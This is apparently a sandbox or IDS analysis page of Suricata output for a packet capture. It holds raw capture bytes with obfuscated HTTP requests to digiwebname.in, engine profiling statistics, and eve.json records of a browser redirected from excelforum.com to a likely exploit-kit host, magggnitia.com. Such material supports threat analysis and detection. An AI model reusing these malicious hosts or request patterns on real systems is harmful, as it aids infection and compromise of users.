 Фƒ$Þ&³	”è˜#{‡‚	lW0—Àaó}D Ê|a XÂ@2pI¸;*HžíSð<É:HÂśoW<L`!Ã<ك8æËéæۆ@’yëÌ7
(H–hx”@™†Ç,37²Y0<.Oµ†'Õ@òuH¾5_;²B*ÄË®¤€$æfOÊú2Ø!5
HŠæª ™¹BÁ"¹‰( ‰˜É±XÚp ¶9ø›ïÙmT,•Ôd@¼³zƒ$Y’D2‡³Ë´+ Y¶ß|“hÕ°\¦@É2<%ýêX!Àû‹&~#ý`ñÈ·ánO8ö[lëWñƒ}é'öl²Å¢+Œõzºx¤«ÅñɑŽOt|z¤£u¤£ÃHGnþ÷µåqú3C7M{ÿ?¬üÿcǚèÿ4.#¶4T†1ßyÌg	À¨Ì‰ÍêºoÀ‚PµT†1ßT†1ßy™E‹£áÀ¨Ì‰ÍêºoÀ‚PPM‚GET /6ktpi5xo/7d0d7c94be7afa7a5b0d525f0558080d0557035f0301090f0250085204510b0d;910 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: digiwebname.in
Connection: Keep-Alive
Cache-Control: no-cache

4T†1ßÒ»Ìg	À¨Ì‰ÍêºoÀƒP T†1ßT†1ßÒ»„Ev£öÀ¨Ì‰ÍêºoÀƒPP[!GET /6ktpi5xo/39e112e34c7d1c884055130a0309540a010a560a05505508060d5d070200570a;4060531 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: digiwebname.in
Connection: Keep-Alive

4	T†1á
 
Ìg	À¨Ì‰ÍêºoÀ„Pš	T†1áT†1á
 
~Ep£üÀ¨Ì‰ÍêºoÀ„PP³eGET /6ktpi5xo/656f20b469bc9cc

This file has been truncated. Go here to download in full.


packet_stats.log - (12908 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          2311          2266510      673308453     430252701        994.3b   97.76
 IPv4      17            53         23826380      674602557     429103777         22.7b    2.24
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          2311            66270       17847761        330281        763.3m   88.94
TMM_FLOWWORKER              IPv4      17            53           139401       12748859        556286         29.5m    3.44
TMM_RECEIVEPCAPFILE         IPv4       6          2289             2547       21118930         23346         53.4m    6.23
TMM_RECEIVEPCAPFILE         IPv4      17            53             2551           7163          2942        155.9k    0.02
TMM_DECODEPCAPFILE          IPv4       6          2289             2652        4783727          5104         11.7m    1.36
TMM_DECODEPCAPFILE          IPv4      17            53             2700           8902          3363        178.3k    0.02

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       6          2289             2820          86712          3581          8.2m  1.12  
flow                    IPv4      17            53             2823          22954          4239        224.7k  0.03  
stream                  IPv4       6          2311             2569         571335         20229         46.7m  6.39  
app-layer               IPv4      17            53             2533          34764         12643        670.1k  0.09  
detect                  IPv4       6          2311            44685       17195582        278197        642.9m  87.87 
detect                  IPv4      17            53           123261       12595719        478708         25.4m  3.47  
tcp-prune               IPv4       6          2311             2518          89185          3248          7.5m  1.03  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            54             3115          80135         10201        550.9k  63.74 
http                    IPv4      17             4             7278          11160         10189         40.8k  4.72  
tls                     IPv4       6            10             2796           4485          3499         35.0k  4.05  
dns                     IPv4      17            34             3967          22504          6990        237.7k  27.50 
Proto detect            IPv4      17            27             3033           9467          5322        143.7k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            19            19647         101251         46662        886.6k  3.71  
LOGGER_UNIFIED2             IPv4       6            19            20057         187130         61926          1.2m  4.92  
LOGGER_JSON_ALERT           IPv4       6            19            46027         156417         81107          1.5m  6.45  
LOGGER_JSON_DNS             IPv4      17            30            29701         304283         81977          2.5m  10.29 
LOGGER_JSON_HTTP            IPv4       6           100            39880         373508         83052          8.3m  34.75 
LOGGER_JSON_TLS             IPv4       6             5            30277          44594         39168        195.8k  0.82  
LOGGER_JSON_FILE            IPv4       6            99            51788         366850         94301          9.3m  39.06 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6          1537             2579         430451         19152        29.4m  15.81 
payload                           IPv4      17            53             3627          44554         17098       906.2k  0.49  
stream                            IPv4       6          1537             2536        2049632         30967        47.6m  25.57 
http_uri                          IPv4       6           100             3816         111694         18369         1.8m  0.99  
http_request_line                 IPv4       6           100             3094          22863          5795       579.6k  0.31  
http_client_body                  IPv4       6           113             2641         244927          6683       755.3k  0.41  
http_header (request)             IPv4       6           100            13541         131275         42984         4.3m  2.31  
http_header (request trailer)     IPv4       6           100             2586          30255          3283       328.4k  0.18  
http_header_names (request)       IPv4       6           100             5431          56126         12609         1.3m  0.68  
http_accept (request)             IPv4       6           100             2890          30712          4379       438.0k  0.24  
http_referer (request)            IPv4       6           100             2869          39207          5057       505.7k  0.27  
http_content_len (request)        IPv4       6           100             2876           8348          3552       355.3k  0.19  
http_content_type (request)       IPv4       6           100             2919          20891          3469       346.9k  0.19  
http_start (request)              IPv4       6           100             5828          37849          9648       964.9k  0.52  
http_raw_header (request)         IPv4       6           113             3912          54404         12670         1.4m  0.77  
http_method                       IPv4       6           100             2793          34221          4184       418.5k  0.22  
http_cookie (request)             IPv4       6           100             2851          33848          5933       593.3k  0.32  
http_raw_uri                      IPv4       6           100             2771          35649          4868       486.9k  0.26  
http_user_agent                   IPv4       6           100             6233          35585         16711         1.7m  0.90  
http_host                         IPv4       6           100             3199          33576          6682       668.2k  0.36  
dns_query                         IPv4      17            16             5494          33989          9937       159.0k  0.09  
tls_sni                           IPv4       6             8             2632           7093          3608        28.9k  0.02  
http_response_line                IPv4       6           100             3304          23318          5453       545.4k  0.29  
http_header (response)            IPv4       6           100             9758          94172         26866         2.7m  1.44  
http_header (response trailer)    IPv4       6           100             2577          28450          3971       397.2k  0.21  
http_content_type (response)      IPv4       6           100             2820          61737          5474       547.5k  0.29  
http_raw_header (response)        IPv4       6          1125             3479          43427          5564         6.3m  3.36  
http_cookie (response)            IPv4       6           100             2872          61812          4466       446.6k  0.24  
http_stat_code                    IPv4       6           100             2684          30439          4002       400.2k  0.22  
tls_cert_issuer                   IPv4       6             5             2605           8867          5694        28.5k  0.02  
tls_cert_subject                  IPv4       6             5             2807          23462          8778        43.9k  0.02  
tls_cert_serial                   IPv4       6             5             2591           5595          3876        19.4k  0.01  
file_data (http response)         IPv4       6          1125             2569        5930774         70845        79.7m  42.82 
Total                             IPv4                  7742                                         24043       186.1m

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       6           100             3478         115232         23463          2.3m  0.25  
PROF_DETECT_IPONLY          IPv4      17            37            11792          58874         32037          1.2m  0.12  
PROF_DETECT_RULES           IPv4       6          2311             2525       16607052        106011        245.0m  25.64 
PROF_DETECT_RULES           IPv4      17            53            45034       12461503        356797         18.9m  1.98  
PROF_DETECT_STATEFUL_START    IPv4       6          1007             5104       16103975        110850        111.6m  11.68 
PROF_DETECT_STATEFUL_CONT    IPv4       6          2311             2508          68156          7773         18.0m  1.88  
PROF_DETECT_STATEFUL_CONT    IPv4      17            53             2555           9555          3921        207.8k  0.02  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2119             2557         399146          3095          6.6m  0.69  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            32             2617          14934          3442        110.1k  0.01  
PROF_DETECT_PREFILTER       IPv4       6          2311             7867       15875574        121505        280.8m  29.39 
PROF_DETECT_PREFILTER       IPv4      17            53            24744          85267         47172          2.5m  0.26  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1537            13229        2075633         58881         90.5m  9.47  
PROF_DETECT_PF_PAYLOAD      IPv4      17            53             8686          49911         22892          1.2m  0.13  
PROF_DETECT_PF_TX           IPv4       6          2119             2555        6613645         64086        135.8m  14.21 
PROF_DETECT_PF_TX           IPv4      17            18             2641          39757         14382        258.9k  0.03  
PROF_DETECT_PF_SORT1        IPv4       6           942             2536          37299          3546          3.3m  0.35  
PROF_DETECT_PF_SORT1        IPv4      17            53             2807          11580          3684        195.3k  0.02  
PROF_DETECT_PF_SORT2        IPv4       6          2311             2521         391748          3232          7.5m  0.78  
PROF_DETECT_PF_SORT2        IPv4      17            53             2558           4872          3121        165.5k  0.02  
PROF_DETECT_NONMPMLIST      IPv4       6          2311             2529          40372          3080          7.1m  0.75  
PROF_DETECT_NONMPMLIST      IPv4      17            53             2724          17844          3573        189.4k  0.02  
PROF_DETECT_ALERT           IPv4       6          2311             2523         100368          2973          6.9m  0.72  
PROF_DETECT_ALERT           IPv4      17            53             2534           8681          2885        152.9k  0.02  
PROF_DETECT_CLEANUP         IPv4       6          2311             2558          63869          3103          7.2m  0.75  
PROF_DETECT_CLEANUP         IPv4      17            53             2533          10499          3356        177.9k  0.02  
PROF_DETECT_GETSGH          IPv4       6          2311             2527          39079          3175          7.3m  0.77  
PROF_DETECT_GETSGH          IPv4      17            53             2740          17322          5869        311.1k  0.03  


stats.log - (3460 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
------------------------------------------------------------------------------------
Date: 11/16/2018 -- 14:57:21 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 2342
decoder.bytes                              | Total                     | 1800077
decoder.ipv4                               | Total                     | 2342
decoder.ethernet                           | Total                     | 2342
decoder.tcp                                | Total                     | 2289
decoder.udp                                | Total                     | 53
decoder.avg_pkt_size                       | Total                     | 768
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 54
flow.udp                                   | Total                     | 22
tcp.sessions                               | Total                     | 45
tcp.syn                                    | Total                     | 45
tcp.synack                                 | Total                     | 45
tcp.rst                                    | Total                     | 34
tcp.overlap                                | Total                     | 61
detect.alert                               | Total                     | 29
detect.mpm_list                            | Total                     | 3
detect.nonmpm_list                         | Total                     | 1
detect.match_list                          | Total                     | 4
app_layer.flow.http                        | Total                     | 40
app_layer.tx.http                          | Total                     | 100
app_layer.flow.tls                         | Total                     | 5
app_layer.flow.dns_udp                     | Total                     | 16
app_layer.tx.dns_udp                       | Total                     | 16
app_layer.flow.failed_udp                  | Total                     | 6
flow_mgr.closed_pruned                     | Total                     | 26
flow_mgr.new_pruned                        | Total                     | 15
flow_mgr.est_pruned                        | Total                     | 14
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 76
flow_mgr.flows_notimeout                   | Total                     | 5
flow_mgr.flows_timeout                     | Total                     | 71
flow_mgr.flows_timeout_inuse               | Total                     | 16
flow_mgr.flows_removed                     | Total                     | 55
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65460
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7096192


eve.json - (173483 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
{"timestamp":"2014-12-08T23:18:41.791185+0000","flow_id":760882209618013,"pcap_cnt":11,"event_type":"http","src_ip":"192.168.204.137","src_port":49251,"dest_ip":"173.194.112.24","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.google.de","url":"\/url?url=http:\/\/www.excelforum.com\/&rct=j&frm=1&q=&esrc=s&sa=U&ei=yDGGVJmOOMv6UpregYgB&ved=0CCsQFjAD&usg=AFQjCNEaastQ4Jl1-R8Ba_-j6m7GMzl4dg","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html"}}
{"timestamp":"2014-12-08T23:18:41.791255+0000","flow_id":760882209618013,"pcap_cnt":12,"event_type":"fileinfo","src_ip":"173.194.112.24","src_port":80,"dest_ip":"192.168.204.137","dest_port":49251,"proto":"TCP","http":{"hostname":"www.google.de","url":"\/url?url=http:\/\/www.excelforum.com\/&rct=j&frm=1&q=&esrc=s&sa=U&ei=yDGGVJmOOMv6UpregYgB&ved=0CCsQFjAD&usg=AFQjCNEaastQ4Jl1-R8Ba_-j6m7GMzl4dg","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/url","gaps":false,"state":"CLOSED","stored":false,"size":1055,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:41.809017+0000","flow_id":1002347418441785,"pcap_cnt":13,"event_type":"dns","src_ip":"192.168.204.137","src_port":58818,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13540,"rrname":"www.excelforum.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:41.965228+0000","flow_id":1002347418441785,"pcap_cnt":15,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":13540,"rcode":"NOERROR","rrname":"www.excelforum.com","rrtype":"CNAME","ttl":5,"rdata":"excelforum.com"}}
{"timestamp":"2014-12-08T23:18:41.965228+0000","flow_id":1002347418441785,"pcap_cnt":15,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":58818,"proto":"UDP","dns":{"type":"answer","id":13540,"rcode":"NOERROR","rrname":"excelforum.com","rrtype":"A","ttl":5,"rdata":"69.167.155.134"}}
{"timestamp":"2014-12-08T23:18:42.033162+0000","flow_id":760882209618013,"pcap_cnt":18,"event_type":"http","src_ip":"192.168.204.137","src_port":49251,"dest_ip":"173.194.112.24","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.google.de","url":"\/favicon.ico","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"image\/x-icon"}}
{"timestamp":"2014-12-08T23:18:42.065915+0000","flow_id":1893604672012667,"pcap_cnt":19,"event_type":"dns","src_ip":"192.168.204.137","src_port":58832,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":22878,"rrname":"isatap.localdomain","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:42.847675+0000","flow_id":1567215074864955,"pcap_cnt":44,"event_type":"dns","src_ip":"192.168.204.137","src_port":61044,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48529,"rrname":"magggnitia.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:42.864479+0000","flow_id":509323827622111,"pcap_cnt":45,"event_type":"dns","src_ip":"192.168.204.137","src_port":49795,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14017,"rrname":"time.windows.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:42.985851+0000","flow_id":1567215074864955,"pcap_cnt":46,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":61044,"proto":"UDP","dns":{"type":"answer","id":48529,"rcode":"NOERROR","rrname":"magggnitia.com","rrtype":"A","ttl":5,"rdata":"94.242.216.69"}}
{"timestamp":"2014-12-08T23:18:43.073336+0000","flow_id":439401760104056,"pcap_cnt":56,"event_type":"dns","src_ip":"192.168.204.137","src_port":63865,"dest_ip":"192.168.204.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":41145,"rrname":"pagead2.googlesyndication.com","rrtype":"A","tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.122587+0000","flow_id":509323827622111,"pcap_cnt":91,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":49795,"proto":"UDP","dns":{"type":"answer","id":14017,"rcode":"NOERROR","rrname":"time.windows.com","rrtype":"CNAME","ttl":5,"rdata":"time.microsoft.akadns.net"}}
{"timestamp":"2014-12-08T23:18:43.122587+0000","flow_id":509323827622111,"pcap_cnt":91,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":49795,"proto":"UDP","dns":{"type":"answer","id":14017,"rcode":"NOERROR","rrname":"time.microsoft.akadns.net","rrtype":"A","ttl":5,"rdata":"65.55.56.206"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead2.googlesyndication.com","rrtype":"CNAME","ttl":5,"rdata":"pagead46.l.doubleclick.net"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead46.l.doubleclick.net","rrtype":"A","ttl":5,"rdata":"173.194.112.26"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead46.l.doubleclick.net","rrtype":"A","ttl":5,"rdata":"173.194.112.25"}}
{"timestamp":"2014-12-08T23:18:43.242417+0000","flow_id":439401760104056,"pcap_cnt":96,"event_type":"dns","src_ip":"192.168.204.2","src_port":53,"dest_ip":"192.168.204.137","dest_port":63865,"proto":"UDP","dns":{"type":"answer","id":41145,"rcode":"NOERROR","rrname":"pagead46.l.doubleclick.net","rrtype":"A","ttl":5,"rdata":"173.194.112.13"}}
{"timestamp":"2014-12-08T23:18:43.289061+0000","flow_id":1119127579266740,"pcap_cnt":99,"event_type":"http","src_ip":"192.168.204.137","src_port":49258,"dest_ip":"94.242.216.69","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"magggnitia.com","url":"\/?Q2WP=p4VpeSdhe5ba&nw3=9n6MZfU9I_1Ydl8y&9M5to=_8w6t8o4W_abrev&GgiMa=8Hfr8Tlcgkd0sfV&t6Mry=I6n2","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.289983+0000","flow_id":1119127579266740,"pcap_cnt":101,"event_type":"fileinfo","src_ip":"94.242.216.69","src_port":80,"dest_ip":"192.168.204.137","dest_port":49258,"proto":"TCP","http":{"hostname":"magggnitia.com","url":"\/?Q2WP=p4VpeSdhe5ba&nw3=9n6MZfU9I_1Ydl8y&9M5to=_8w6t8o4W_abrev&GgiMa=8Hfr8Tlcgkd0sfV&t6Mry=I6n2","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1084},"app_proto":"http","fileinfo":{"filename":"\/","gaps":false,"state":"CLOSED","stored":false,"size":1947,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.339674+0000","flow_id":2126969572609155,"pcap_cnt":149,"event_type":"http","src_ip":"192.168.204.137","src_port":49256,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_read_marker.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.339937+0000","flow_id":2126969572609155,"pcap_cnt":152,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49256,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_read_marker.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4446},"app_proto":"http","fileinfo":{"filename":"\/clientscript\/vbulletin_read_marker.js","gaps":false,"state":"CLOSED","stored":false,"size":4446,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.341854+0000","flow_id":1598622023208298,"pcap_cnt":163,"event_type":"http","src_ip":"192.168.204.137","src_port":49257,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_css\/style00014l\/additional.css?d=1416658908","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/css"}}
{"timestamp":"2014-12-08T23:18:43.591392+0000","flow_id":1046892671846788,"pcap_cnt":243,"event_type":"http","src_ip":"192.168.204.137","src_port":49253,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/zero-clipboard.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.594062+0000","flow_id":1046892671846788,"pcap_cnt":249,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49253,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/clientscript\/zero-clipboard.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20303},"app_proto":"http","fileinfo":{"filename":"\/clientscript\/zero-clipboard.js","gaps":false,"state":"CLOSED","stored":false,"size":20303,"tx_id":0}}
{"timestamp":"2014-12-08T23:18:43.602871+0000","flow_id":1598622023208298,"pcap_cnt":288,"event_type":"http","src_ip":"192.168.204.137","src_port":49257,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_md5.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.602906+0000","flow_id":1598622023208298,"pcap_cnt":289,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49257,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/clientscript\/vbulletin_md5.js?v=418","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"application\/javascript","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464},"app_proto":"http","fileinfo":{"filename":"\/clientscript\/vbulletin_md5.js","gaps":false,"state":"CLOSED","stored":false,"size":5464,"tx_id":1}}
{"timestamp":"2014-12-08T23:18:43.623766+0000","flow_id":1018571657557602,"pcap_cnt":296,"event_type":"http","src_ip":"192.168.204.137","src_port":49259,"dest_ip":"173.194.112.26","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"pagead2.googlesyndication.com","url":"\/pagead\/show_ads.js","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/javascript"}}
{"timestamp":"2014-12-08T23:18:43.734476+0000","flow_id":2126969572609155,"pcap_cnt":299,"event_type":"http","src_ip":"192.168.204.137","src_port":49256,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"www.excelforum.com","url":"\/css.php?styleid=14&langid=1&d=1416658908&sheet=MARCO1_CKEditor_CSS.css","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/css"}}
{"timestamp":"2014-12-08T23:18:43.734939+0000","flow_id":2126969572609155,"pcap_cnt":301,"event_type":"fileinfo","src_ip":"69.167.155.134","src_port":80,"dest_ip":"192.168.204.137","dest_port":49256,"proto":"TCP","http":{"hostname":"www.excelforum.com","url":"\/css.php?styleid=14&langid=1&d=1416658908&sheet=MARCO1_CKEditor_CSS.css","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/css","http_refer":"http:\/\/www.excelforum.com\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":81},"app_proto":"http","fileinfo":{"filename":"\/css.php","gaps":false,"state":"CLOSED","stored":false,"size":72,"tx_id":1}}
{"timestamp":"2014-12-08T23:18:43.821216+0000","flow_id":672801020296327,"pcap_cnt":310,"event_type":"http","src_ip":"192.168.204.137","src_port":49252,"dest_ip":"69.167.155.134","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.excelforum.com","url":"\/","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)","http_content_type":"text\/html"}}
